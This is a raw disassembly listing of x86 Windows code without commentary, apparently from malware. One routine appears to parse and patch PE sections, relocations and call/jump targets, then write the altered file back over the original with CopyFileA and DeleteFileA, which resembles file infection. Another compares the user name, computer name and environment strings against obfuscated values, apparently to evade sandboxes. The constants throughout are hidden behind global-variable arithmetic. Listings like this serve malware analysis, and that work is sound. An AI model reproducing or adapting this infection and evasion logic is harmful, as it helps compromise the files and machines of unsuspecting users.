; ---------------------------------------------------------------------------
loc_4400A5: ; CODE XREF: sub_43F4CC+BA1�j
; sub_43F4CC+BB7�j ...
mov eax, dword_44D1B4
add eax, dword_44D150
sub eax, 6
cmp byte ptr [ebx+eax], 2Eh
jnz short loc_4400EF
mov eax, dword_44D218
sub eax, 8
cmp byte ptr [ebx+eax], 65h
jnz short loc_4400EF
mov eax, dword_44D1AC
add eax, dword_44D1A0
cmp byte ptr [ebx+eax], 61h
jnz short loc_4400EF
mov eax, [ebx+14h]
mov [ebp+var_117C], eax
mov eax, [ebx+0Ch]
mov [ebp+var_1184], eax
jmp loc_440260
; ---------------------------------------------------------------------------
loc_4400EF: ; CODE XREF: sub_43F4CC+BEB�j
; sub_43F4CC+BF9�j ...
mov eax, dword_44D1E0
add eax, dword_44D238
sub eax, 0Ah
cmp byte ptr [ebx+eax], 2Eh
jnz short loc_440134
mov eax, dword_44D218
add eax, dword_44D200
sub eax, 0Eh
cmp byte ptr [ebx+eax], 69h
jnz short loc_440134
movsx eax, word_44D098
movsx edx, word_44D228
add eax, edx
sub eax, 4
cmp byte ptr [ebx+eax], 61h
jz loc_440260
loc_440134: ; CODE XREF: sub_43F4CC+C35�j
; sub_43F4CC+C49�j
push ebx
push esi
call ds:dword_4491A4
mov eax, [ebx+8]
mov [esi+8], eax
mov eax, [ebp+var_20]
mov [esi+0Ch], eax
mov eax, [ebx+10h]
mov [esi+10h], eax
mov eax, [ebp+var_10]
mov [esi+14h], eax
mov eax, [ebx+24h]
mov [esi+24h], eax
mov eax, dword_44D1A4
add eax, 2
movsx edx, word_44D194
add eax, edx
push eax
movsx eax, word_44D0F4
sub eax, 7
push eax
mov eax, esi
add eax, 18h
push eax
call ds:dword_44B818
mov edi, [ebp+var_18]
mov edx, [ebx+0Ch]
mov [ebp+edi*4+var_420], edx
mov edx, [ebx+8]
mov [ebp+edi*4+var_83C], edx
mov edx, [esi+0Ch]
mov [ebp+edi*4+var_C4C], edx
mov edx, [esi+14h]
mov [ebp+edi*4+var_1050], edx
inc [ebp+var_18]
mov eax, [ebx+10h]
add [ebp+var_10], eax
mov eax, [ebp+var_10]
mov [ebp+var_31F44], eax
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
push [ebp+var_10]
call sub_44108C
add esp, 1Ch
mov [ebp+var_10], eax
mov eax, dword_44D0AC
movsx edx, word_44D128
add eax, edx
sub eax, 9
cmp byte ptr [ebx+eax], 64h
jnz short loc_44020B
mov eax, [ebp+var_31F44]
cmp [ebp+var_10], eax
jbe short loc_44020B
mov ecx, [ebp+var_10]
sub ecx, eax
mov [ebp+var_31F50], ecx
mov eax, ecx
add [esi+8], eax
mov eax, ecx
add [esi+10h], eax
loc_44020B: ; CODE XREF: sub_43F4CC+D1D�j
; sub_43F4CC+D28�j
mov eax, dword_44D1A8
add eax, 0FF1h
movsx edx, word_44D220
add eax, edx
push eax
mov eax, [ebp+var_20]
add eax, [ebx+8]
push eax
call sub_44108C
mov [ebp+var_20], eax
mov eax, [ebp+var_8]
add eax, 6
inc word ptr [eax]
mov eax, [ebp+var_8]
mov edx, [esi+0Ch]
add edx, [ebx+8]
mov [eax+50h], edx
push dword ptr [esi+10h]
mov eax, [ebx+14h]
add eax, [ebp+var_42C]
push eax
mov eax, [esi+14h]
add eax, [ebp+var_4]
push eax
call ds:dword_44B808
add esp, 14h
loc_440260: ; CODE XREF: sub_43F4CC+BD4�j
; sub_43F4CC+C1E�j ...
inc [ebp+var_440]
loc_440266: ; CODE XREF: sub_43F4CC+B2C�j
mov eax, [ebp+var_848]
movzx eax, word ptr [eax+6]
cmp [ebp+var_440], eax
jb loc_43FFFD
mov eax, [ebp+var_1178]
add eax, [ebp+var_42C]
mov [ebp+var_14], eax
loc_44028B: ; CODE XREF: sub_43F4CC+FF5�j
movsx eax, word_44D180
sub eax, 5
mov [ebp+var_1C], eax
jmp short loc_4402F6
; ---------------------------------------------------------------------------
loc_44029A: ; CODE XREF: sub_43F4CC+E30�j
mov edi, [ebp+var_1C]
mov edx, [ebp+var_14]
mov edx, [edx]
cmp [ebp+edi*4+var_420], edx
jnz short loc_4402B6
mov eax, [ebp+var_14]
mov eax, [eax]
mov [ebp+var_C50], eax
loc_4402B6: ; CODE XREF: sub_43F4CC+DDD�j
mov edi, [ebp+var_1C]
shl edi, 2
mov edx, [ebp+edi+var_420]
add edx, [ebp+edi+var_83C]
mov edi, [ebp+var_14]
cmp edx, [edi]
jbe short loc_4402F3
mov edi, [ebp+var_1C]
mov edi, [ebp+edi*4+var_1050]
mov [ebp+var_106C], edi
mov edi, [ebp+var_1C]
mov edi, [ebp+edi*4+var_C4C]
mov [ebp+var_1054], edi
jmp short loc_4402FE
; ---------------------------------------------------------------------------
loc_4402F3: ; CODE XREF: sub_43F4CC+E03�j
inc [ebp+var_1C]
loc_4402F6: ; CODE XREF: sub_43F4CC+DCC�j
mov eax, [ebp+var_18]
cmp [ebp+var_1C], eax
jb short loc_44029A
loc_4402FE: ; CODE XREF: sub_43F4CC+E25�j
mov eax, dword_44D18C
add eax, dword_44D0B0
sub eax, 0Ah
mov [ebp+var_428], eax
jmp loc_440487
; ---------------------------------------------------------------------------
loc_440317: ; CODE XREF: sub_43F4CC+FC7�j
mov eax, [ebp+var_428]
movsx edx, word_44D1DC
dec edx
add eax, edx
add eax, [ebp+var_14]
mov [ebp+var_31F48], eax
mov ax, [eax]
mov word ptr [ebp+var_31F44], ax
movzx eax, word ptr [ebp+var_31F44]
mov edx, dword_44D184
dec edx
cmp eax, edx
jz loc_440499
movzx edi, word ptr [ebp+var_31F44]
mov edx, dword_44D238
add edx, dword_44D218
mov ecx, edx
sub ecx, 6
sar edi, cl
mov word ptr [ebp+var_31F4C+2], di
movzx edi, word ptr [ebp+var_31F44]
movsx edx, word_44D090
add edx, dword_44D100
mov ecx, edx
sub ecx, 8
shl edi, cl
mov word ptr [ebp+var_31F44+2], di
movzx edi, word ptr [ebp+var_31F44+2]
mov edx, dword_44D1C8
mov ecx, edx
add ecx, dword_44D150
sar edi, cl
mov word ptr [ebp+var_31F44+2], di
movzx eax, word ptr [ebp+var_31F44+2]
mov edx, dword_44D0C8
movsx ecx, word_44D0E4
add edx, ecx
sub edx, 4
cmp eax, edx
jnz short loc_4403E8
mov eax, dword_44D1A0
add eax, dword_44D1FC
sub eax, 4
cmp [ebp+var_428], eax
jnz loc_440499
loc_4403E8: ; CODE XREF: sub_43F4CC+F00�j
mov eax, [ebp+var_848]
mov eax, [eax+34h]
mov edx, [ebp+var_14]
add eax, [edx]
movzx edx, word ptr [ebp+var_31F44+2]
add eax, edx
mov [ebp+var_31F50], eax
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1054]
mov edx, [ebp+var_14]
add eax, [edx]
sub eax, [ebp+var_C50]
movzx edx, word ptr [ebp+var_31F44+2]
add eax, edx
mov [ebp+var_31F54], eax
sub eax, [ebp+var_31F50]
mov [ebp+var_31F58], eax
movzx eax, word ptr [ebp+var_31F4C+2]
mov edx, dword_44D1A0
add edx, 2
add edx, dword_44D1C4
cmp eax, edx
jnz short loc_44047C
mov eax, [ebp+var_106C]
mov edx, [ebp+var_14]
add eax, [edx]
sub eax, [ebp+var_C50]
movzx edx, word ptr [ebp+var_31F44+2]
add eax, edx
add eax, [ebp+var_4]
mov [ebp+var_31F5C], eax
mov edx, [ebp+var_31F58]
add [eax], edx
loc_44047C: ; CODE XREF: sub_43F4CC+F83�j
mov eax, dword_44D0E0
add [ebp+var_428], eax
loc_440487: ; CODE XREF: sub_43F4CC+E46�j
mov eax, [ebp+var_14]
mov eax, [eax+4]
cmp [ebp+var_428], eax
jb loc_440317
loc_440499: ; CODE XREF: sub_43F4CC+E7E�j
; sub_43F4CC+F16�j
mov eax, [ebp+var_14]
mov edx, [eax+4]
add edx, eax
mov [ebp+var_14], edx
mov eax, [ebp+var_848]
mov eax, [eax+0A4h]
mov edx, [ebp+var_1178]
add edx, [ebp+var_42C]
add eax, edx
cmp [ebp+var_14], eax
jb loc_44028B
mov eax, [ebp+var_8]
mov ecx, [eax+28h]
mov [ebp+var_1188], ecx
mov edx, [ebp+var_1060]
mov [eax+28h], edx
cmp [ebp+var_1180], 0
jnz short loc_440504
add eax, 60h
mov edx, [ebp+var_848]
mov edx, [edx+60h]
add [eax], edx
mov eax, [ebp+var_8]
add eax, 68h
mov edx, [ebp+var_848]
mov edx, [edx+68h]
add [eax], edx
loc_440504: ; CODE XREF: sub_43F4CC+1017�j
mov eax, [ebp+var_8]
movsx edx, word_44D098
add edx, 8
mov [eax+44h], dx
movsx edx, word_44D194
add edx, dword_44D1B0
sub edx, 8
mov [eax+1Ah], dl
mov edx, dword_44D1A4
movsx ecx, word_44D220
add edx, ecx
sub edx, 3
mov [eax+46h], dx
mov eax, [ebp+var_117C]
add eax, [ebp+var_42C]
mov [ebp+var_31EE4], eax
mov eax, [ebp+var_117C]
mov edx, [ebp+var_31EE4]
add eax, [edx+1Ch]
sub eax, [ebp+var_1184]
mov [ebp+var_31EE8], eax
add eax, [ebp+var_42C]
mov [ebp+var_31EEC], eax
mov eax, [eax]
mov [ebp+var_1058], eax
movsx eax, word_44D0F4
movsx edx, word_44D0B8
add eax, edx
sub eax, 10h
mov [ebp+var_24], eax
jmp short loc_4405D8
; ---------------------------------------------------------------------------
loc_440597: ; CODE XREF: sub_43F4CC+1112�j
mov edi, [ebp+var_24]
shl edi, 2
mov edx, [ebp+edi+var_420]
add edx, [ebp+edi+var_83C]
cmp edx, [ebp+var_1058]
jbe short loc_4405D5
mov edi, [ebp+var_24]
mov edi, [ebp+edi*4+var_420]
mov [ebp+var_118C], edi
mov edi, [ebp+var_24]
mov edi, [ebp+edi*4+var_C4C]
mov [ebp+var_1194], edi
jmp short loc_4405E0
; ---------------------------------------------------------------------------
loc_4405D5: ; CODE XREF: sub_43F4CC+10E5�j
inc [ebp+var_24]
loc_4405D8: ; CODE XREF: sub_43F4CC+10C9�j
mov eax, [ebp+var_18]
cmp [ebp+var_24], eax
jb short loc_440597
loc_4405E0: ; CODE XREF: sub_43F4CC+1107�j
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1194]
add eax, [ebp+var_1058]
sub eax, [ebp+var_118C]
mov [ebp+var_1190], eax
mov eax, [ebp+var_848]
mov eax, [eax+34h]
add eax, [ebp+var_1058]
mov [ebp+var_1058], eax
mov eax, [ebp+var_850]
mov [ebp+var_C], eax
jmp loc_440893
; ---------------------------------------------------------------------------
loc_440621: ; CODE XREF: sub_43F4CC+13D3�j
mov eax, [ebp+var_C]
mov edx, [ebp+var_4]
movzx ecx, byte ptr [edx+eax]
movsx edi, word_44D110
add edi, 0E9h
cmp ecx, edi
jnz loc_44074D
movsx ecx, word_44D1F0
add ecx, dword_44D0A8
sub ecx, 5
mov edi, eax
add edi, ecx
movzx ecx, byte ptr [edx+edi]
mov edi, dword_44D1E0
dec edi
cmp ecx, edi
jnz loc_44074D
movsx ecx, word_44D114
add ecx, dword_44D134
sub ecx, 0Bh
mov edi, eax
add edi, ecx
movzx ecx, byte ptr [edx+edi]
mov edi, dword_44D1E8
add edi, dword_44D0CC
sub edi, 0Dh
cmp ecx, edi
jnz loc_44074D
mov ecx, dword_44D240
add ecx, 3
mov edi, eax
add edi, ecx
movzx ecx, byte ptr [edx+edi]
mov edi, dword_44D0BC
sub edi, 2
cmp ecx, edi
jnz loc_44074D
movsx ecx, word_44D130
add ecx, 2
add eax, ecx
movzx eax, byte ptr [edx+eax]
movsx edx, word_44D1DC
sub edx, 9
cmp eax, edx
jnz short loc_44074D
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1060]
mov edx, [ebp+var_C]
sub edx, [ebp+var_850]
add eax, edx
mov [ebp+var_31F44], eax
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1188]
mov [ebp+var_31F48], eax
mov eax, dword_44D200
add eax, 0FFFFFFF9h
sub eax, [ebp+var_31F44]
add eax, [ebp+var_31F48]
mov edx, dword_44D16C
add edx, 2
sub eax, edx
mov [ebp+var_31F4C], eax
mov edi, dword_44D178
add edi, dword_44D198
mov edx, [ebp+var_C]
mov ecx, dword_44D1FC
sub ecx, 3
add edx, ecx
add edx, [ebp+var_4]
mov ecx, eax
mov [edx+edi*4-38h], ecx
loc_44074D: ; CODE XREF: sub_43F4CC+116E�j
; sub_43F4CC+1195�j ...
mov eax, [ebp+var_C]
mov edx, [ebp+var_4]
mov [ebp+var_31F44], edx
mov ecx, dword_44D170
movzx edi, byte ptr [edx+eax]
mov edx, dword_44D0C8
lea edx, [ecx+edx+0E1h]
cmp edi, edx
jnz loc_440890
mov edx, dword_44D09C
mov ecx, eax
add ecx, edx
mov edx, [ebp+var_31F44]
movzx edx, byte ptr [edx+ecx]
movsx ecx, word_44D130
sub ecx, 2
cmp edx, ecx
jnz loc_440890
mov edx, dword_44D0A4
add edx, dword_44D0DC
sub edx, 7
mov ecx, eax
add ecx, edx
mov edx, [ebp+var_31F44]
movzx edx, byte ptr [edx+ecx]
mov ecx, dword_44D1C4
dec ecx
cmp edx, ecx
jnz loc_440890
mov edx, dword_44D124
movsx ecx, word_44D164
add edx, ecx
sub edx, 3
mov ecx, eax
add ecx, edx
mov edx, [ebp+var_31F44]
movzx edx, byte ptr [edx+ecx]
mov ecx, dword_44D170
sub ecx, 5
cmp edx, ecx
jnz loc_440890
movsx edx, word_44D0C4
sub edx, 5
add eax, edx
mov edx, [ebp+var_31F44]
movzx eax, byte ptr [edx+eax]
mov edx, dword_44D09C
dec edx
cmp eax, edx
jnz short loc_440890
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1060]
mov edx, [ebp+var_C]
sub edx, [ebp+var_850]
add eax, edx
mov [ebp+var_31F48], eax
mov eax, [ebp+var_1190]
mov [ebp+var_31F4C], eax
mov eax, dword_44D0F0
add eax, 0FFFFFFFFh
sub eax, [ebp+var_31F48]
add eax, [ebp+var_31F4C]
movsx edx, word_44D0B8
sub edx, 5
sub eax, edx
mov [ebp+var_31F50], eax
movsx edi, word_44D164
mov edx, [ebp+var_C]
movsx ecx, word_44D12C
add ecx, dword_44D15C
sub ecx, 7
add edx, ecx
add edx, [ebp+var_4]
mov ecx, eax
mov [edx+edi*4-10h], ecx
loc_440890: ; CODE XREF: sub_43F4CC+12A6�j
; sub_43F4CC+12CC�j ...
inc [ebp+var_C]
loc_440893: ; CODE XREF: sub_43F4CC+1150�j
mov eax, [ebp+var_850]
add eax, 0Dh
cmp [ebp+var_C], eax
jb loc_440621
push [ebp+var_1070]
call ds:dword_44B82C ; CloseHandle
push [ebp+arg_0]
lea eax, [ebp+var_116F]
push eax
call ds:dword_4491A4
add esp, 8
lea ecx, [ebp+var_116F]
or eax, 0FFFFFFFFh
loc_4408CD: ; CODE XREF: sub_43F4CC+1406�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4408CD
mov [ebp+var_31ED8], eax
mov edx, dword_44D0C0
movsx ecx, word_44D194
add edx, ecx
sub edx, 0Ah
sub eax, edx
mov [ebp+eax+var_116F], 69h
mov eax, [ebp+var_31ED8]
movsx edx, word_44D194
add edx, dword_44D1A4
sub edx, 8
sub eax, edx
mov [ebp+eax+var_116F], 76h
mov eax, [ebp+var_31ED8]
mov edx, dword_44D094
add edx, dword_44D170
sub edx, 6
sub eax, edx
mov [ebp+eax+var_116F], 72h
push 0
mov eax, dword_44D0C0
sub eax, 4
push eax
push 2
push 0
movsx eax, word_44D090
add eax, dword_44D1CC
sub eax, 6
push eax
push 40000000h
lea eax, [ebp+var_116F]
push eax
call ds:dword_44C968 ; CreateFileA
mov [ebp+var_1070], eax
push 0
lea eax, [ebp+var_31EDC]
push eax
push [ebp+var_10]
push [ebp+var_4]
push [ebp+var_1070]
call ds:dword_44CD6C ; WriteFile
push [ebp+var_1070]
call ds:dword_44B82C ; CloseHandle
push [ebp+var_4]
call ds:dword_4495CC ; LocalFree
push 0
push [ebp+arg_0]
lea eax, [ebp+var_116F]
push eax
call ds:dword_44A534 ; CopyFileA
lea eax, [ebp+var_116F]
push eax
call ds:dword_446008 ; DeleteFileA
mov eax, 1
jmp short loc_4409DA
; ---------------------------------------------------------------------------
loc_4409C3: ; CODE XREF: sub_43F4CC+103�j
; sub_43F4CC+11D�j ...
push [ebp+var_1070]
call ds:dword_44B82C ; CloseHandle
push [ebp+var_4]
call ds:dword_4495CC ; LocalFree
xor eax, eax
loc_4409DA: ; CODE XREF: sub_43F4CC+9F�j
; sub_43F4CC+14F5�j
pop edi
pop esi
pop ebx
leave
retn
sub_43F4CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4409DF proc near ; CODE XREF: sub_43A39F+34�p
var_20C = dword ptr -20Ch
var_208 = dword ptr -208h
var_204 = dword ptr -204h
var_1FE = byte ptr -1FEh
var_105 = byte ptr -105h
var_FF = byte ptr -0FFh
push ebp
mov ebp, esp
sub esp, 20Ch
push ebx
push esi
push edi
call sub_43AF59
or eax, eax
jz loc_440C07
mov [ebp+var_204], 0FFh
lea eax, [ebp+var_204]
push eax
lea eax, [ebp+var_FF]
push eax
call ds:dword_4495A0 ; GetUserNameA
mov eax, dword_44D118
movsx eax, [ebp+eax+var_105]
mov edx, dword_44D0E0
sub edx, 2
cmp eax, edx
jnz short loc_440A38
xor eax, eax
inc eax
jmp loc_440C07
; ---------------------------------------------------------------------------
loc_440A38: ; CODE XREF: sub_4409DF+4F�j
push offset byte_44E29F
call sub_43AC82
mov edx, dword_44D158
add edx, dword_44D118
sub edx, 0Dh
push edx
push eax
lea edx, [ebp+var_FF]
push edx
call sub_444D98
add esp, 10h
movsx ecx, word_44D204
add ecx, 0FFF9h
cmp eax, ecx
jz short loc_440A7B
xor eax, eax
inc eax
jmp loc_440C07
; ---------------------------------------------------------------------------
loc_440A7B: ; CODE XREF: sub_4409DF+92�j
push offset byte_44E293
call sub_43AC82
mov edx, dword_44D168
sub edx, 8
push edx
push eax
lea edx, [ebp+var_FF]
push edx
call sub_444D98
add esp, 10h
mov edx, eax
movsx ecx, word_44D0F4
movsx eax, word_44D164
lea ecx, [ecx+eax+0FFF4h]
cmp edx, ecx
jz short loc_440AC2
xor eax, eax
inc eax
jmp loc_440C07
; ---------------------------------------------------------------------------
loc_440AC2: ; CODE XREF: sub_4409DF+D9�j
mov [ebp+var_208], 0FFh
lea eax, [ebp+var_208]
push eax
lea eax, [ebp+var_1FE]
push eax
call ds:dword_446038 ; GetComputerNameA
push offset word_44E28E
call sub_43AC82
push eax
lea edx, [ebp+var_1FE]
push edx
call ds:dword_446024
mov eax, dword_44D14C
sub eax, 7
push eax
lea eax, [ebp+var_FF]
push eax
lea eax, [ebp+var_1FE]
push eax
call sub_444D98
add esp, 18h
mov edx, dword_44D1D4
add edx, 0FFFAh
cmp eax, edx
jz short loc_440B2F
xor eax, eax
inc eax
jmp loc_440C07
; ---------------------------------------------------------------------------
loc_440B2F: ; CODE XREF: sub_4409DF+146�j
call ds:dword_44C800 ; GetEnvironmentStringsA
mov esi, eax
mov edi, esi
xor ebx, ebx
loc_440B3B: ; CODE XREF: sub_4409DF+211�j
mov eax, dword_44D1F8
sub eax, 6
movzx eax, byte ptr [edi+eax]
mov edx, dword_44D100
sub edx, 7
cmp eax, edx
jz loc_440BF5
mov ecx, edi
or eax, 0FFFFFFFFh
loc_440B5D: ; CODE XREF: sub_4409DF+183�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_440B5D
mov [ebp+var_20C], eax
push offset dword_44E284
call sub_43AC82
add esp, 4
movsx edx, word_44D0B4
sub edx, 3
push edx
push eax
push edi
call sub_444D98
add esp, 0Ch
mov ecx, dword_44D1F4
add ecx, 0FFFCh
cmp eax, ecx
jz short loc_440BA3
mov ebx, 1
jmp short loc_440BF5
; ---------------------------------------------------------------------------
loc_440BA3: ; CODE XREF: sub_4409DF+1BB�j
push offset byte_44E273
call sub_43AC82
mov edx, dword_44D170
add edx, dword_44D1AC
sub edx, 9
push edx
push eax
push edi
call sub_444D98
add esp, 10h
mov ecx, dword_44D1D4
add ecx, 0FFFAh
cmp eax, ecx
jz short loc_440BDC
xor ebx, ebx
inc ebx
jmp short loc_440BF5
; ---------------------------------------------------------------------------
loc_440BDC: ; CODE XREF: sub_4409DF+1F6�j
mov eax, dword_44D234
sub eax, 2
mov edx, [ebp+var_20C]
add edx, edi
mov edi, eax
add edi, edx
jmp loc_440B3B
; ---------------------------------------------------------------------------
loc_440BF5: ; CODE XREF: sub_4409DF+173�j
; sub_4409DF+1C2�j ...
push esi
call ds:dword_44B828 ; FreeEnvironmentStringsA
or ebx, ebx
jz short loc_440C05
xor eax, eax
inc eax
jmp short loc_440C07
; ---------------------------------------------------------------------------
loc_440C05: ; CODE XREF: sub_4409DF+21F�j
xor eax, eax
loc_440C07: ; CODE XREF: sub_4409DF+13�j
; sub_4409DF+54�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_4409DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_440C0C proc near ; DATA XREF: .data:off_44D364�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_8]
push offset dword_44ECC4
push esi
call ds:dword_44C824
or eax, eax
jz short loc_440C38
mov eax, [ebp+arg_0]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_440C80
; ---------------------------------------------------------------------------
loc_440C38: ; CODE XREF: sub_440C0C+1A�j
push offset dword_44EC34
push esi
call ds:dword_44C824
or eax, eax
jz short loc_440C58
mov eax, [ebp+arg_0]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_440C80
; ---------------------------------------------------------------------------
loc_440C58: ; CODE XREF: sub_440C0C+3A�j
push offset dword_44EBF4
push esi
call ds:dword_44C824
or eax, eax
jz short loc_440C78
mov eax, [ebp+arg_0]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_440C80
; ---------------------------------------------------------------------------
loc_440C78: ; CODE XREF: sub_440C0C+5A�j
and dword ptr [edi], 0
mov eax, 80004002h
loc_440C80: ; CODE XREF: sub_440C0C+2A�j
; sub_440C0C+4A�j ...
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
sub_440C0C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_440C87 proc near ; DATA XREF: .data:0044D36C�o
push ebp
mov ebp, esp
mov eax, dword_44D0AC
add eax, dword_44D22C
sub eax, 9
cmp ds:dword_4495B8, eax
jbe short loc_440CAB
push offset dword_4495B8
call ds:dword_446010 ; InterlockedDecrement
loc_440CAB: ; CODE XREF: sub_440C87+17�j
mov eax, ds:dword_4495B8
pop ebp
retn 4
sub_440C87 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_440CB4 proc near ; CODE XREF: sub_43E524+238�p
; sub_43EB7A+304�p ...
var_120A = byte ptr -120Ah
var_110B = byte ptr -110Bh
var_100C = dword ptr -100Ch
var_1008 = dword ptr -1008h
var_1004 = dword ptr -1004h
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 120Ch
call sub_445950
push ebx
push esi
push edi
push offset dword_44DE44
call sub_43AC82
push eax
lea edi, [ebp+var_FFF]
push edi
call ds:dword_44C810
add esp, 0Ch
mov esi, dword_44D1A0
jmp short loc_440D07
; ---------------------------------------------------------------------------
loc_440CE7: ; CODE XREF: sub_440CB4+59�j
cmp [ebp+esi+var_FFF], 23h
jnz short loc_440D06
mov eax, dword_44D150
add eax, dword_44D1B0
sub eax, 9
mov [ebp+esi+var_FFF], al
loc_440D06: ; CODE XREF: sub_440CB4+3B�j
inc esi
loc_440D07: ; CODE XREF: sub_440CB4+31�j
cmp esi, 0FFFh
jb short loc_440CE7
movsx eax, word_44D128
add eax, dword_44D1D8
sub eax, 8
mov [ebp+var_1004], eax
mov ebx, dword_44D1E0
dec ebx
cmp [ebp+arg_0], 0
jnz short loc_440D91
loc_440D32: ; CODE XREF: sub_440CB4+DB�j
mov eax, [ebp+arg_4]
cmp [ebp+var_1004], eax
jnz short loc_440D54
lea eax, [ebp+ebx+var_FFF]
push eax
push offset dword_44C850
call sub_445970
jmp loc_440FDA
; ---------------------------------------------------------------------------
loc_440D54: ; CODE XREF: sub_440CB4+87�j
lea ecx, [ebp+ebx+var_FFF]
or eax, 0FFFFFFFFh
loc_440D5E: ; CODE XREF: sub_440CB4+AF�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_440D5E
add ebx, eax
add ebx, 1
inc [ebp+var_1004]
movsx eax, [ebp+ebx+var_FFF]
mov edx, dword_44D1BC
add edx, dword_44D0CC
sub edx, 9
cmp eax, edx
jz loc_440FDA
jmp short loc_440D32
; ---------------------------------------------------------------------------
loc_440D91: ; CODE XREF: sub_440CB4+7C�j
mov eax, dword_44D31C
mov [ebp+var_1008], eax
movsx eax, word_44D148
mov edx, [ebp+arg_0]
mov ecx, dword_44D0D8
add ecx, dword_44D0F0
sub ecx, 5
mov [edx+eax], cl
movsx ebx, word_44D204
sub ebx, 6
mov eax, dword_44D0C0
add eax, dword_44D13C
sub eax, 0Ch
mov [ebp+var_1004], eax
loc_440DD6: ; CODE XREF: sub_440CB4+2FE�j
push offset byte_44DE39
call sub_43AC82
push eax
lea edi, [ebp+var_110B]
push edi
call sub_445970
lea eax, [ebp+ebx+var_FFF]
push eax
lea eax, [ebp+var_110B]
push eax
call ds:dword_446024
add esp, 0Ch
call ds:dword_44CD90
mov ecx, 14h
cdq
idiv ecx
mov [ebp+var_100C], edx
mov eax, dword_44D1BC
add eax, dword_44D09C
sub eax, 2
cmp edx, eax
jnb loc_440F04
push [ebp+var_1008]
lea eax, [ebp+var_120A]
push eax
call sub_44318C
push dword_44D18C
lea eax, [ebp+var_110B]
push eax
push [ebp+arg_0]
call sub_444D98
add esp, 14h
mov edi, dword_44D1E4
add edi, 0FFFEh
cmp eax, edi
jnz short loc_440E90
lea eax, [ebp+var_110B]
push eax
push [ebp+arg_0]
call ds:dword_446024
push offset dword_44DE34
call sub_43AC82
push eax
push [ebp+arg_0]
call ds:dword_446024
add esp, 14h
loc_440E90: ; CODE XREF: sub_440CB4+1B3�j
movsx eax, word_44D220
add eax, dword_44D208
sub eax, 0Ch
push eax
lea eax, [ebp+var_120A]
push eax
push [ebp+arg_0]
call sub_444D98
add esp, 0Ch
mov edi, dword_44D0C8
add edi, 0FFFDh
cmp eax, edi
jnz short loc_440EFE
push offset byte_44DE29
call sub_43AC82
push eax
push [ebp+arg_0]
call ds:dword_446024
lea eax, [ebp+var_120A]
push eax
push [ebp+arg_0]
call ds:dword_446024
push offset dword_44DE24
call sub_43AC82
push eax
push [ebp+arg_0]
call ds:dword_446024
add esp, 20h
loc_440EFE: ; CODE XREF: sub_440CB4+20D�j
inc [ebp+var_1008]
loc_440F04: ; CODE XREF: sub_440CB4+175�j
push [ebp+var_1004]
call sub_44450E
pop ecx
mov [ebp+var_100C], eax
mov eax, dword_44D108
movsx edx, word_44D0F4
add eax, edx
sub eax, 0Eh
cmp [ebp+var_100C], eax
jnb short loc_440F83
movsx eax, word_44D160
sub eax, 5
push eax
lea eax, [ebp+var_110B]
push eax
push [ebp+arg_0]
call sub_444D98
add esp, 0Ch
mov edi, dword_44D1A0
add edi, 0FFFFh
cmp eax, edi
jnz short loc_440F83
lea eax, [ebp+var_110B]
push eax
push [ebp+arg_0]
call ds:dword_446024
push offset byte_44DE1F
call sub_43AC82
push eax
push [ebp+arg_0]
call ds:dword_446024
add esp, 14h
loc_440F83: ; CODE XREF: sub_440CB4+279�j
; sub_440CB4+2A6�j
lea ecx, [ebp+ebx+var_FFF]
or eax, 0FFFFFFFFh
loc_440F8D: ; CODE XREF: sub_440CB4+2DE�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_440F8D
add ebx, eax
add ebx, 1
inc [ebp+var_1004]
movsx eax, [ebp+ebx+var_FFF]
mov edx, dword_44D0AC
sub edx, 5
cmp eax, edx
jnz loc_440DD6
push offset word_44DE1A
call sub_43AC82
push eax
push [ebp+arg_0]
call ds:dword_446024
add esp, 0Ch
mov eax, [ebp+var_1008]
mov dword_44D31C, eax
loc_440FDA: ; CODE XREF: sub_440CB4+9B�j
; sub_440CB4+D5�j
pop edi
pop esi
pop ebx
leave
retn
sub_440CB4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_440FDF proc near ; CODE XREF: sub_43EB7A+125�p
; DATA XREF: sub_43E524+102�o
var_104 = byte ptr -104h
var_FF = byte ptr -0FFh
push ebp
mov ebp, esp
sub esp, 104h
push esi
push edi
push 0
push dword_44D0DC
push 3
push 0
mov eax, dword_44D0D8
sub eax, 5
push eax
push 80000000h
push offset dword_44A220
call ds:dword_44C968 ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_44101D
mov eax, 2Ah
jmp short loc_441080
; ---------------------------------------------------------------------------
loc_44101D: ; CODE XREF: sub_440FDF+35�j
push 0
lea eax, [ebp+var_104]
push eax
push 0FFh
lea eax, [ebp+var_FF]
push eax
push edi
call ds:dword_44602C ; ReadFile
mov esi, eax
push edi
call ds:dword_44B82C ; CloseHandle
mov eax, dword_44D1A8
movsx edx, word_44D110
add eax, edx
sub eax, 8
cmp esi, eax
jnz short loc_44105E
